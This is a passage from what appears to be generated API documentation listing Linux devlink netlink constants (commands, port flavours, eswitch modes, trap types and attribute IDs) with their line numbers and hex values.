| DEVLINK_CMD_PORT_GET = 0x5 constant DEVLINK_CMD_PORT_SET (line 3137) | DEVLINK_CMD_PORT_SET = 0x6 constant DEVLINK_CMD_PORT_NEW (line 3138) | DEVLINK_CMD_PORT_NEW = 0x7 constant DEVLINK_CMD_PORT_DEL (line 3139) | DEVLINK_CMD_PORT_DEL = 0x8 constant DEVLINK_CMD_PORT_SPLIT (line 3140) | DEVLINK_CMD_PORT_SPLIT = 0x9 constant DEVLINK_CMD_PORT_UNSPLIT (line 3141) | DEVLINK_CMD_PORT_UNSPLIT = 0xa constant DEVLINK_CMD_SB_GET (line 3142) | DEVLINK_CMD_SB_GET = 0xb constant DEVLINK_CMD_SB_SET (line 3143) | DEVLINK_CMD_SB_SET = 0xc constant DEVLINK_CMD_SB_NEW (line 3144) | DEVLINK_CMD_SB_NEW = 0xd constant DEVLINK_CMD_SB_DEL (line 3145) | DEVLINK_CMD_SB_DEL = 0xe constant DEVLINK_CMD_SB_POOL_GET (line 3146) | DEVLINK_CMD_SB_POOL_GET = 0xf constant DEVLINK_CMD_SB_POOL_SET (line 3147) | DEVLINK_CMD_SB_POOL_SET = 0x10 constant DEVLINK_CMD_SB_POOL_NEW (line 3148) | DEVLINK_CMD_SB_POOL_NEW = 0x11 constant DEVLINK_CMD_SB_POOL_DEL (line 3149) | DEVLINK_CMD_SB_POOL_DEL = 0x12 constant DEVLINK_CMD_SB_PORT_POOL_GET (line 3150) | DEVLINK_CMD_SB_PORT_POOL_GET = 0x13 constant DEVLINK_CMD_SB_PORT_POOL_SET (line 3151) | DEVLINK_CMD_SB_PORT_POOL_SET = 0x14 constant DEVLINK_CMD_SB_PORT_POOL_NEW (line 3152) | DEVLINK_CMD_SB_PORT_POOL_NEW = 0x15 constant DEVLINK_CMD_SB_PORT_POOL_DEL (line 3153) | DEVLINK_CMD_SB_PORT_POOL_DEL = 0x16 constant DEVLINK_CMD_SB_TC_POOL_BIND_GET (line 3154) | DEVLINK_CMD_SB_TC_POOL_BIND_GET = 0x17 constant DEVLINK_CMD_SB_TC_POOL_BIND_SET (line 3155) | DEVLINK_CMD_SB_TC_POOL_BIND_SET = 0x18 constant DEVLINK_CMD_SB_TC_POOL_BIND_NEW (line 3156) | DEVLINK_CMD_SB_TC_POOL_BIND_NEW = 0x19 constant DEVLINK_CMD_SB_TC_POOL_BIND_DEL (line 3157) | DEVLINK_CMD_SB_TC_POOL_BIND_DEL = 0x1a constant DEVLINK_CMD_SB_OCC_SNAPSHOT (line 3158) | DEVLINK_CMD_SB_OCC_SNAPSHOT = 0x1b constant DEVLINK_CMD_SB_OCC_MAX_CLEAR (line 3159) | DEVLINK_CMD_SB_OCC_MAX_CLEAR = 0x1c constant DEVLINK_CMD_ESWITCH_GET (line 3160) | DEVLINK_CMD_ESWITCH_GET = 0x1d constant DEVLINK_CMD_ESWITCH_SET (line 3161) | DEVLINK_CMD_ESWITCH_SET = 0x1e constant DEVLINK_CMD_DPIPE_TABLE_GET (line 3162) | DEVLINK_CMD_DPIPE_TABLE_GET = 0x1f constant DEVLINK_CMD_DPIPE_ENTRIES_GET (line 3163) | DEVLINK_CMD_DPIPE_ENTRIES_GET = 0x20 constant DEVLINK_CMD_DPIPE_HEADERS_GET (line 3164) | DEVLINK_CMD_DPIPE_HEADERS_GET = 0x21 constant DEVLINK_CMD_DPIPE_TABLE_COUNTERS_SET (line 3165) | DEVLINK_CMD_DPIPE_TABLE_COUNTERS_SET = 0x22 constant DEVLINK_CMD_RESOURCE_SET (line 3166) | DEVLINK_CMD_RESOURCE_SET = 0x23 constant DEVLINK_CMD_RESOURCE_DUMP (line 3167) | DEVLINK_CMD_RESOURCE_DUMP = 0x24 constant DEVLINK_CMD_RELOAD (line 3168) | DEVLINK_CMD_RELOAD = 0x25 constant DEVLINK_CMD_PARAM_GET (line 3169) | DEVLINK_CMD_PARAM_GET = 0x26 constant DEVLINK_CMD_PARAM_SET (line 3170) | DEVLINK_CMD_PARAM_SET = 0x27 constant DEVLINK_CMD_PARAM_NEW (line 3171) | DEVLINK_CMD_PARAM_NEW = 0x28 constant DEVLINK_CMD_PARAM_DEL (line 3172) | DEVLINK_CMD_PARAM_DEL = 0x29 constant DEVLINK_CMD_REGION_GET (line 3173) | DEVLINK_CMD_REGION_GET = 0x2a constant DEVLINK_CMD_REGION_SET (line 3174) | DEVLINK_CMD_REGION_SET = 0x2b constant DEVLINK_CMD_REGION_NEW (line 3175) | DEVLINK_CMD_REGION_NEW = 0x2c constant DEVLINK_CMD_REGION_DEL (line 3176) | DEVLINK_CMD_REGION_DEL = 0x2d constant DEVLINK_CMD_REGION_READ (line 3177) | DEVLINK_CMD_REGION_READ = 0x2e constant DEVLINK_CMD_PORT_PARAM_GET (line 3178) | DEVLINK_CMD_PORT_PARAM_GET = 0x2f constant DEVLINK_CMD_PORT_PARAM_SET (line 3179) | DEVLINK_CMD_PORT_PARAM_SET = 0x30 constant DEVLINK_CMD_PORT_PARAM_NEW (line 3180) | DEVLINK_CMD_PORT_PARAM_NEW = 0x31 constant DEVLINK_CMD_PORT_PARAM_DEL (line 3181) | DEVLINK_CMD_PORT_PARAM_DEL = 0x32 constant DEVLINK_CMD_INFO_GET (line 3182) | DEVLINK_CMD_INFO_GET = 0x33 constant DEVLINK_CMD_HEALTH_REPORTER_GET (line 3183) | DEVLINK_CMD_HEALTH_REPORTER_GET = 0x34 constant DEVLINK_CMD_HEALTH_REPORTER_SET (line 3184) | DEVLINK_CMD_HEALTH_REPORTER_SET = 0x35 constant DEVLINK_CMD_HEALTH_REPORTER_RECOVER (line 3185) | DEVLINK_CMD_HEALTH_REPORTER_RECOVER = 0x36 constant DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE (line 3186) | DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE = 0x37 constant DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET (line 3187) | DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET = 0x38 constant DEVLINK_CMD_HEALTH_REPORTER_DUMP_CLEAR (line 3188) | DEVLINK_CMD_HEALTH_REPORTER_DUMP_CLEAR = 0x39 constant DEVLINK_CMD_FLASH_UPDATE (line 3189) | DEVLINK_CMD_FLASH_UPDATE = 0x3a constant DEVLINK_CMD_FLASH_UPDATE_END (line 3190) | DEVLINK_CMD_FLASH_UPDATE_END = 0x3b constant DEVLINK_CMD_FLASH_UPDATE_STATUS (line 3191) | DEVLINK_CMD_FLASH_UPDATE_STATUS = 0x3c constant DEVLINK_CMD_TRAP_GET (line 3192) | DEVLINK_CMD_TRAP_GET = 0x3d constant DEVLINK_CMD_TRAP_SET (line 3193) | DEVLINK_CMD_TRAP_SET = 0x3e constant DEVLINK_CMD_TRAP_NEW (line 3194) | DEVLINK_CMD_TRAP_NEW = 0x3f constant DEVLINK_CMD_TRAP_DEL (line 3195) | DEVLINK_CMD_TRAP_DEL = 0x40 constant DEVLINK_CMD_TRAP_GROUP_GET (line 3196) | DEVLINK_CMD_TRAP_GROUP_GET = 0x41 constant DEVLINK_CMD_TRAP_GROUP_SET (line 3197) | DEVLINK_CMD_TRAP_GROUP_SET = 0x42 constant DEVLINK_CMD_TRAP_GROUP_NEW (line 3198) | DEVLINK_CMD_TRAP_GROUP_NEW = 0x43 constant DEVLINK_CMD_TRAP_GROUP_DEL (line 3199) | DEVLINK_CMD_TRAP_GROUP_DEL = 0x44 constant DEVLINK_CMD_TRAP_POLICER_GET (line 3200) | DEVLINK_CMD_TRAP_POLICER_GET = 0x45 constant DEVLINK_CMD_TRAP_POLICER_SET (line 3201) | DEVLINK_CMD_TRAP_POLICER_SET = 0x46 constant DEVLINK_CMD_TRAP_POLICER_NEW (line 3202) | DEVLINK_CMD_TRAP_POLICER_NEW = 0x47 constant DEVLINK_CMD_TRAP_POLICER_DEL (line 3203) | DEVLINK_CMD_TRAP_POLICER_DEL = 0x48 constant DEVLINK_CMD_HEALTH_REPORTER_TEST (line 3204) | DEVLINK_CMD_HEALTH_REPORTER_TEST = 0x49 constant DEVLINK_CMD_RATE_GET (line 3205) | DEVLINK_CMD_RATE_GET = 0x4a constant DEVLINK_CMD_RATE_SET (line 3206) | DEVLINK_CMD_RATE_SET = 0x4b constant DEVLINK_CMD_RATE_NEW (line 3207) | DEVLINK_CMD_RATE_NEW = 0x4c constant DEVLINK_CMD_RATE_DEL (line 3208) | DEVLINK_CMD_RATE_DEL = 0x4d constant DEVLINK_CMD_LINECARD_GET (line 3209) | DEVLINK_CMD_LINECARD_GET = 0x4e constant DEVLINK_CMD_LINECARD_SET (line 3210) | DEVLINK_CMD_LINECARD_SET = 0x4f constant DEVLINK_CMD_LINECARD_NEW (line 3211) | DEVLINK_CMD_LINECARD_NEW = 0x50 constant DEVLINK_CMD_LINECARD_DEL (line 3212) | DEVLINK_CMD_LINECARD_DEL = 0x51 constant DEVLINK_CMD_SELFTESTS_GET (line 3213) | DEVLINK_CMD_SELFTESTS_GET = 0x52 constant DEVLINK_CMD_MAX (line 3214) | DEVLINK_CMD_MAX = 0x53 constant DEVLINK_PORT_TYPE_NOTSET (line 3215) | DEVLINK_PORT_TYPE_NOTSET = 0x0 constant DEVLINK_PORT_TYPE_AUTO (line 3216) | DEVLINK_PORT_TYPE_AUTO = 0x1 constant DEVLINK_PORT_TYPE_ETH (line 3217) | DEVLINK_PORT_TYPE_ETH = 0x2 constant DEVLINK_PORT_TYPE_IB (line 3218) | DEVLINK_PORT_TYPE_IB = 0x3 constant DEVLINK_SB_POOL_TYPE_INGRESS (line 3219) | DEVLINK_SB_POOL_TYPE_INGRESS = 0x0 constant DEVLINK_SB_POOL_TYPE_EGRESS (line 3220) | DEVLINK_SB_POOL_TYPE_EGRESS = 0x1 constant DEVLINK_SB_THRESHOLD_TYPE_STATIC (line 3221) | DEVLINK_SB_THRESHOLD_TYPE_STATIC = 0x0 constant DEVLINK_SB_THRESHOLD_TYPE_DYNAMIC (line 3222) | DEVLINK_SB_THRESHOLD_TYPE_DYNAMIC = 0x1 constant DEVLINK_ESWITCH_MODE_LEGACY (line 3223) | DEVLINK_ESWITCH_MODE_LEGACY = 0x0 constant DEVLINK_ESWITCH_MODE_SWITCHDEV (line 3224) | DEVLINK_ESWITCH_MODE_SWITCHDEV = 0x1 constant DEVLINK_ESWITCH_INLINE_MODE_NONE (line 3225) | DEVLINK_ESWITCH_INLINE_MODE_NONE = 0x0 constant DEVLINK_ESWITCH_INLINE_MODE_LINK (line 3226) | DEVLINK_ESWITCH_INLINE_MODE_LINK = 0x1 constant DEVLINK_ESWITCH_INLINE_MODE_NETWORK (line 3227) | DEVLINK_ESWITCH_INLINE_MODE_NETWORK = 0x2 constant DEVLINK_ESWITCH_INLINE_MODE_TRANSPORT (line 3228) | DEVLINK_ESWITCH_INLINE_MODE_TRANSPORT = 0x3 constant DEVLINK_ESWITCH_ENCAP_MODE_NONE (line 3229) | DEVLINK_ESWITCH_ENCAP_MODE_NONE = 0x0 constant DEVLINK_ESWITCH_ENCAP_MODE_BASIC (line 3230) | DEVLINK_ESWITCH_ENCAP_MODE_BASIC = 0x1 constant DEVLINK_PORT_FLAVOUR_PHYSICAL (line 3231) | DEVLINK_PORT_FLAVOUR_PHYSICAL = 0x0 constant DEVLINK_PORT_FLAVOUR_CPU (line 3232) | DEVLINK_PORT_FLAVOUR_CPU = 0x1 constant DEVLINK_PORT_FLAVOUR_DSA (line 3233) | DEVLINK_PORT_FLAVOUR_DSA = 0x2 constant DEVLINK_PORT_FLAVOUR_PCI_PF (line 3234) | DEVLINK_PORT_FLAVOUR_PCI_PF = 0x3 constant DEVLINK_PORT_FLAVOUR_PCI_VF (line 3235) | DEVLINK_PORT_FLAVOUR_PCI_VF = 0x4 constant DEVLINK_PORT_FLAVOUR_VIRTUAL (line 3236) | DEVLINK_PORT_FLAVOUR_VIRTUAL = 0x5 constant DEVLINK_PORT_FLAVOUR_UNUSED (line 3237) | DEVLINK_PORT_FLAVOUR_UNUSED = 0x6 constant DEVLINK_PARAM_CMODE_RUNTIME (line 3238) | DEVLINK_PARAM_CMODE_RUNTIME = 0x0 constant DEVLINK_PARAM_CMODE_DRIVERINIT (line 3239) | DEVLINK_PARAM_CMODE_DRIVERINIT = 0x1 constant DEVLINK_PARAM_CMODE_PERMANENT (line 3240) | DEVLINK_PARAM_CMODE_PERMANENT = 0x2 constant DEVLINK_PARAM_CMODE_MAX (line 3241) | DEVLINK_PARAM_CMODE_MAX = 0x2 constant DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_DRIVER (line 3242) | DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_DRIVER = 0x0 constant DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_FLASH (line 3243) | DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_FLASH = 0x1 constant DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_DISK (line 3244) | DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_DISK = 0x2 constant DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_UNKNOWN (line 3245) | DEVLINK_PARAM_FW_LOAD_POLICY_VALUE_UNKNOWN = 0x3 constant DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_UNKNOWN (line 3246) | DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_UNKNOWN = 0x0 constant DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_ALWAYS (line 3247) | DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_ALWAYS = 0x1 constant DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_NEVER (line 3248) | DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_NEVER = 0x2 constant DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_DISK (line 3249) | DEVLINK_PARAM_RESET_DEV_ON_DRV_PROBE_VALUE_DISK = 0x3 constant DEVLINK_ATTR_STATS_RX_PACKETS (line 3250) | DEVLINK_ATTR_STATS_RX_PACKETS = 0x0 constant DEVLINK_ATTR_STATS_RX_BYTES (line 3251) | DEVLINK_ATTR_STATS_RX_BYTES = 0x1 constant DEVLINK_ATTR_STATS_RX_DROPPED (line 3252) | DEVLINK_ATTR_STATS_RX_DROPPED = 0x2 constant DEVLINK_ATTR_STATS_MAX (line 3253) | DEVLINK_ATTR_STATS_MAX = 0x2 constant DEVLINK_FLASH_OVERWRITE_SETTINGS_BIT (line 3254) | DEVLINK_FLASH_OVERWRITE_SETTINGS_BIT = 0x0 constant DEVLINK_FLASH_OVERWRITE_IDENTIFIERS_BIT (line 3255) | DEVLINK_FLASH_OVERWRITE_IDENTIFIERS_BIT = 0x1 constant DEVLINK_FLASH_OVERWRITE_MAX_BIT (line 3256) | DEVLINK_FLASH_OVERWRITE_MAX_BIT = 0x1 constant DEVLINK_TRAP_ACTION_DROP (line 3257) | DEVLINK_TRAP_ACTION_DROP = 0x0 constant DEVLINK_TRAP_ACTION_TRAP (line 3258) | DEVLINK_TRAP_ACTION_TRAP = 0x1 constant DEVLINK_TRAP_ACTION_MIRROR (line 3259) | DEVLINK_TRAP_ACTION_MIRROR = 0x2 constant DEVLINK_TRAP_TYPE_DROP (line 3260) | DEVLINK_TRAP_TYPE_DROP = 0x0 constant DEVLINK_TRAP_TYPE_EXCEPTION (line 3261) | DEVLINK_TRAP_TYPE_EXCEPTION = 0x1 constant DEVLINK_TRAP_TYPE_CONTROL (line 3262) | DEVLINK_TRAP_TYPE_CONTROL = 0x2 constant DEVLINK_ATTR_TRAP_METADATA_TYPE_IN_PORT (line 3263) | DEVLINK_ATTR_TRAP_METADATA_TYPE_IN_PORT = 0x0 constant DEVLINK_ATTR_TRAP_METADATA_TYPE_FA_COOKIE (line 3264) | DEVLINK_ATTR_TRAP_METADATA_TYPE_FA_COOKIE = 0x1 constant DEVLINK_RELOAD_ACTION_UNSPEC (line 3265) | DEVLINK_RELOAD_ACTION_UNSPEC = 0x0 constant DEVLINK_RELOAD_ACTION_DRIVER_REINIT (line 3266) | DEVLINK_RELOAD_ACTION_DRIVER_REINIT = 0x1 constant DEVLINK_RELOAD_ACTION_FW_ACTIVATE (line 3267) | DEVLINK_RELOAD_ACTION_FW_ACTIVATE = 0x2 constant DEVLINK_RELOAD_ACTION_MAX (line 3268) | DEVLINK_RELOAD_ACTION_MAX = 0x2 constant DEVLINK_RELOAD_LIMIT_UNSPEC (line 3269) | DEVLINK_RELOAD_LIMIT_UNSPEC = 0x0 constant DEVLINK_RELOAD_LIMIT_NO_RESET (line 3270) | DEVLINK_RELOAD_LIMIT_NO_RESET = 0x1 constant DEVLINK_RELOAD_LIMIT_MAX (line 3271) | DEVLINK_RELOAD_LIMIT_MAX = 0x1 constant DEVLINK_ATTR_UNSPEC (line 3272) | DEVLINK_ATTR_UNSPEC = 0x0 constant DEVLINK_ATTR_BUS_NAME (line 3273) | DEVLINK_ATTR_BUS_NAME = 0x1 constant DEVLINK_ATTR_DEV_NAME (line 3274) | DEVLINK_ATTR_DEV_NAME = 0x2 constant DEVLINK_ATTR_PORT_INDEX (line 3275) | DEVLINK_ATTR_PORT_INDEX = 0x3 constant DEVLINK_ATTR_PORT_TYPE (line 3276) | DEVLINK_ATTR_PORT_TYPE = 0x4 constant DEVLINK_ATTR_PORT_DESIRED_TYPE (line 3277) | DEVLINK_ATTR_PORT_DESIRED_TYPE = 0x5 constant DEVLINK_ATTR_PORT_NETDEV_IFINDEX (line 3278) | DEVLINK_ATTR_PORT_NETDEV_IFINDEX = 0x6 constant DEVLINK_ATTR_PORT_NETDEV_NAME (line 3279) | DEVLINK_ATTR_PORT_NETDEV_NAME = 0x7 constant DEVLINK_ATTR_PORT_IBDEV_NAME (line 3280) | DEVLINK_ATTR_PORT_IBDEV_NAME = 0x8 constant DEVLINK_ATTR_PORT_SPLIT_COUNT (line 3281) | DEVLINK_ATTR_PORT_SPLIT_COUNT = 0x9 constant DEVLINK_ATTR_PORT_SPLIT_GROUP (line 3282) | DEVLINK_ATTR_PORT_SPLIT_GROUP = 0xa constant DEVLINK_ATTR_SB_INDEX (line 3283) | DEVLINK_ATTR_SB_INDEX = 0xb constant DEVLINK_ATTR_SB_SIZE (line 3284) | DEVLINK_ATTR_SB_SIZE = 0xc constant DEVLINK_ATTR_SB_INGRESS_POOL_COUNT (line 3285) | DEVLINK_ATTR_SB_INGRESS_POOL_COUNT = 0xd constant DEVLINK_ATTR_SB_EGRESS_POOL_COUNT (line 3286) | DEVLINK_ATTR_SB_EGRESS_POOL_COUNT = 0xe constant DEVLINK_ATTR_SB_INGRESS_TC_COUNT (line 3287) | DEVLINK_ATTR_SB_INGRESS_TC_COUNT = 0xf constant DEVLINK_ATTR_SB_EGRESS_TC_COUNT (line 3288) | DEVLINK_ATTR_SB_EGRESS_TC_COUNT = 0x10 constant DEVLINK_ATTR_SB_POOL_INDEX (line 3289) | DEVLINK_ATTR_SB_POOL_INDEX = 0x11 constant DEVLINK_ATTR_SB_POOL_TYPE (line 3290) | DEVLINK_ATTR_SB_POOL_TYPE = 0x12 constant DEVLINK_ATTR_SB_POOL_SIZE (line 3291) | DEVLINK_ATTR_SB_POOL_SIZE = 0x13 constant DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE (line 3292) | DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE = 0x14 constant DEVLINK_ATTR_SB_THRESHOLD (line 3293) | DEVLINK_ATTR_SB_THRESHOLD = 0x15 constant DEVLINK_ATTR_SB_TC_INDEX (line 3294) | DEVLINK_ATTR_SB_TC_INDEX = 0x16 constant DEVLINK_ATTR_SB_OCC_CUR (line 3295) | DEVLINK_ATTR_SB_OCC_CUR = 0x17 constant DEVLINK_ATTR_SB_OCC_MAX (line 3296) | DEVLINK_ATTR_SB_OCC_MAX = 0x18 constant DEVLINK_ATTR_ESWITCH_MODE (line 3297) | DEVLINK_ATTR_ESWITCH_MODE = 0x19 constant DEVLINK_ATTR_ESWITCH_INLINE_MODE (line 3298) | DEVLINK_ATTR_ESWITCH_INLINE_MODE = 0x1a constant DEVLINK_ATTR_DPIPE_TABLES (line 3299) | DEVLINK_ATTR_DPIPE_TABLES = 0x1b constant DEVLINK_ATTR_DPIPE_TABLE (line 3300) | DEVLINK_ATTR_DPIPE_TABLE = 0x1c constant DEVLINK_ATTR_DPIPE_TABLE_NAME (line 3301) | DEVLINK_ATTR_DPIPE_TABLE_NAME = 0x1d constant DEVLINK_ATTR_DPIPE_TABLE_SIZE (line 3302) | DEVLINK_ATTR_DPIPE_TABLE_SIZE = 0x1e constant DEVLINK_ATTR_DPIPE_TABLE_MATCHES (line 3303) | DEVLINK_ATTR_DPIPE_TABLE_MATCHES = 0x1f constant DEVLINK_ATTR_DPIPE_TABLE_ACTIONS (line 3304) | DEVLINK_ATTR_DPIPE_TABLE_ACTIONS = 0x20 constant DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED (line 3305) | DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED = 0x21 constant DEVLINK_ATTR_DPIPE_ENTRIES (line 3306) | DEVLINK_ATTR_DPIPE_ENTRIES = 0x22 constant DEVLINK_ATTR_DPIPE_ENTRY (line 3307) | DEVLINK_ATTR_DPIPE_ENTRY = 0x23 constant DEVLINK_ATTR_DPIPE_ENTRY_INDEX (line 3308) | DEVLINK_ATTR_DPIPE_ENTRY_INDEX = 0x24 constant DEVLINK_ATTR_DPIPE_ENTRY_MATCH_VALUES (line 3309) | DEVLINK_ATTR_DPIPE_ENTRY_MATCH_VALUES = 0x25 constant DEVLINK_ATTR_DPIPE_ENTRY_ACTION_VALUES (line 3310) | DEVLINK_ATTR_DPIPE_ENTRY_ACTION_VALUES = 0x26 constant DEVLINK_ATTR_DPIPE_ENTRY_COUNTER (line 3311) | DEVLINK_ATTR_DPIPE_ENTRY_COUNTER = 0x27 constant DEVLINK_ATTR_DPIPE_MATCH (line 3312) | DEVLINK_ATTR_DPIPE_MATCH = 0x28 constant DEVLINK_ATTR_DPIPE_MATCH_VALUE (line 3313) | DEVLINK_ATTR_DPIPE_MATCH_VALUE = 0x29 constant DEVLINK_ATTR_DPIPE_MATCH_TYPE (line 3314) | DEVLINK_ATTR_DPIPE_MATCH_TYPE = 0x2a constant DEVLINK_ATTR_DPIPE_ACTION (line 3315) | DEVLINK_ATTR_DPIPE_ACTION = 0x2b constant DEVLINK_ATTR_DPIPE_ACTION_VALUE (line 3316) | DEVLINK_ATTR_DPIPE_ACTION_VALUE = 0x2c constant DEVLINK_ATTR_DPIPE_ACTION_TYPE (line 3317) | DEVLINK_ATTR_DPIPE_ACTION_TYPE = 0x2d constant DEVLINK_ATTR_DPIPE_VALUE (line 3318) | DEVLINK_ATTR_DPIPE_VALUE = 0x2e constant DEVLINK_ATTR_DPIPE_VALUE_MASK (line 3319) | DEVLINK_ATTR_DPIPE_VALUE_MASK = 0x2f constant DEVLINK_ATTR_DPIPE_VALUE_MAPPING (line 3320) | DEVLINK_ATTR_DPIPE_VALUE_MAPPING = 0x30 constant DEVLINK_ATTR_DPIPE_HEADERS (line 3321) | DEVLINK_ATTR_DPIPE_HEADERS = 0x31 constant DEVLINK_ATTR_DPIPE_HEADER (line 3322) | DEVLINK_ATTR_DPIPE_HEADER = 0x32 constant DEVLINK_ATTR_DPIPE_HEADER_NAME (line 3323) | DEVLINK_ATTR_DPIPE_HEADER_NAME = 0x33 constant DEVLINK_ATTR_DPIPE_HEADER_ID (line 3324) | DEVLINK_ATTR_DPIPE_HEADER_ID = 0x34 constant DEVLINK_ATTR_DPIPE_HEADER_FIELDS (line 3325) | DEVLINK_ATTR_DPIPE_HEADER_FIELDS = 0x35 constant DEVLINK_ATTR_DPIPE_HEADER_GLOBAL (line 3326) | DEVLINK_ATTR_DPIPE_HEADER_GLOBAL = 0x36 constant DEVLINK_ATTR_DPIPE_HEADER_INDEX (line 3327) | DEVLINK_ATTR_DPIPE_HEADER_INDEX = 0x37 constant DEVLINK_ATTR_DPIPE_FIELD (line 3328) | DEVLINK_ATTR_DPIPE_FIELD = 0x38 constant DEVLINK_ATTR_DPIPE_FIELD_NAME (line 3329) | DEVLINK_ATTR_DPIPE_FIELD_NAME = 0x39 constant DEVLINK_ATTR_DPIPE_FIELD_ID (line 3330) | DEVLINK_ATTR_DPIPE_FIELD_ID = 0x3a constant DEVLINK_ATTR_DPIPE_FIELD_BITWIDTH (line 3331) | DEVLINK_ATTR_DPIPE_FIELD_BITWIDTH = 0x3b constant DEVLINK_ATTR_DPIPE_FIELD_MAPPING_TYPE (line 3332) | DEVLINK_ATTR_DPIPE_FIELD_MAPPING_TYPE = 0x3c constant DEVLINK_ATTR_PAD (line 3333) | DEVLINK_ATTR_PAD = 0x3d constant DEVLINK_ATTR_ESWITCH_ENCAP_MODE (line 3334) | DEVLINK_ATTR_ESWITCH_ENCAP_MODE = 0x3e constant DEVLINK_ATTR_RESOURCE_LIST (line 3335) | DEVLINK_ATTR_RESOURCE_LIST = 0x3f constant DEVLINK_ATTR_RESOURCE (line 3336) | DEVLINK_ATTR_RESOURCE = 0x40 constant DEVLINK_ATTR_RESOURCE_NAME (line 3337) | DEVLINK_ATTR_RESOURCE_NAME = 0x41 constant DEVLINK_ATTR_RESOURCE_ID (line 3338) | DEVLINK_ATTR_RESOURCE_ID = 0x42 constant DEVLINK_ATTR_RESOURCE_SIZE (line 3339) | DEVLINK_ATTR_RESOURCE_SIZE = 0x43 constant DEVLINK_ATTR_RESOURCE_SIZE_NEW (line 3340) | DEVLINK_ATTR_RESOURCE_SIZE_NEW = 0x44 constant DEVLINK_ATTR_RESOURCE_SIZE_VALID (line 3341) | DEVLINK_ATTR_RESOURCE_SIZE_VALID = 0x45 constant DEVLINK_ATTR_RESOURCE_SIZE_MIN (line 3342) | DEVLINK_ATTR_RESOURCE_SIZE_MIN = 0x46 constant DEVLINK_ATTR_RESOURCE_SIZE_MAX (line 3343) | DEVLINK_ATTR_RESOURCE_SIZE_MAX = 0x47 constant DEVLINK_ATTR_RESOURCE_SIZE_GRAN (line 3344) | DEVLINK_ATTR_RESOURCE_SIZE_GRAN = 0x48 constant DEVLINK_ATTR_RESOURCE_UNIT (line 3345) | DEVLINK_ATTR_RESOURCE_UNIT = 0x49 constant DEVLINK_ATTR_RESOURCE_OCC (line 3346) | DEVLINK_ATTR_RESOURCE_OCC = 0x4a constant DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_ID (line 3347) | DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_ID = 0x4b constant DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_UNITS (line 3348) | DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_UNITS = 0x4c constant DEVLINK_ATTR_PORT_FLAVOUR (line 3349) | DEVLINK_ATTR_PORT_FLAVOUR = 0x4d constant DEVLINK_ATTR_PORT_NUMBER (line 3350) | DEVLINK_ATTR_PORT_NUMBER = 0x4e constant DEVLINK_ATTR_PORT_SPLIT_SUBPORT_NUMBER (line 3351) | DEVLINK_ATTR_PORT_SPLIT_SUBPORT_NUMBER = 0x4f constant DEVLINK_ATTR_PARAM (line 3352) | DEVLINK_ATTR_PARAM = 0x50 constant DEVLINK_ATTR_PARAM_NAME (line 3353) | DEVLINK_ATTR_PARAM_NAME = 0x51 constant DEVLINK_ATTR_PARAM_GENERIC (line 3354) | DEVLINK_ATTR_PARAM_GENERIC = 0x52 constant DEVLINK_ATTR_PARAM_TYPE (line 3355) | DEVLINK_ATTR_PARAM_TYPE = 0x53 constant DEVLINK_ATTR_PARAM_VALUES_LIST (line 3356) | DEVLINK_ATTR_PARAM_VALUES_LIST = 0x54 constant DEVLINK_ATTR_PARAM_VALUE (line 3357) | DEVLINK_ATTR_PARAM_VALUE = 0x55 constant DEVLINK_ATTR_PARAM_VALUE_DATA (line 3358) | DEVLINK_ATTR_PARAM_VALUE_DATA = 0x56 constant DEVLINK_ATTR_PARAM_VALUE_CMODE (line 3359) | DEVLINK_ATTR_PARAM_VALUE_CMODE = 0x57 constant DEVLINK_ATTR_REGION_NAME (line 3360) | DEVLINK_ATTR_REGION_NAME = 0x58 constant DEVLINK_ATTR_REGION_SIZE (line 3361) | DEVLINK_ATTR_REGION_SIZE = 0x59 constant DEVLINK_ATTR_REGION_SNAPSHOTS (line 3362) | DEVLINK_ATTR_REGION_SNAPSHOTS = 0x5a constant DEVLINK_ATTR_REGION_SNAPSHOT (line 3363) | DEVLINK_ATTR_REGION_SNAPSHOT = 0x5b constant DEVLINK_ATTR_REGION_SNAPSHOT_ID (line 3364) | DEVLINK_ATTR_REGION_SNAPSHOT_ID = 0x5c constant DEVLINK_ATTR_REGION_CHUNKS (line 3365) | DEVLINK_ATTR_REGION_CHUNKS = 0x5d constant DEVLINK_ATTR_REGION_CHUNK (line 3366) | DEVLINK_ATTR_REGION_CHUNK = 0x5e constant DEVLINK_ATTR_REGION_CHUNK_DATA (line 3367) | DEVLINK_ATTR_REGION_CHUNK_DATA = 0x5f constant DEVLINK_ATTR_REGION_CHUNK_ADDR (line 3368) | DEVLINK_ATTR_REGION_CHUNK_ADDR = 0x60 constant DEVLINK_ATTR_REGION_CHUNK_LEN (line 3369) | DEVLINK_ATTR_REGION_CHUNK_LEN = 0x61 constant DEVLINK_ATTR_INFO_DRIVER_NAME (line 3370) | DEVLINK_ATTR_INFO_DRIVER_NAME = 0x62 constant DEVLINK_ATTR_INFO_SERIAL_NUMBER (line 3371) | DEVLINK_ATTR_INFO_SERIAL_NUMBER = 0x63 constant DEVLINK_ATTR_INFO_VERSION_FIXED (line 3372) | DEVLINK_ATTR_INFO_VERSION_FIXED = 0x64 constant DEVLINK_ATTR_INFO_VERSION_RUNNING 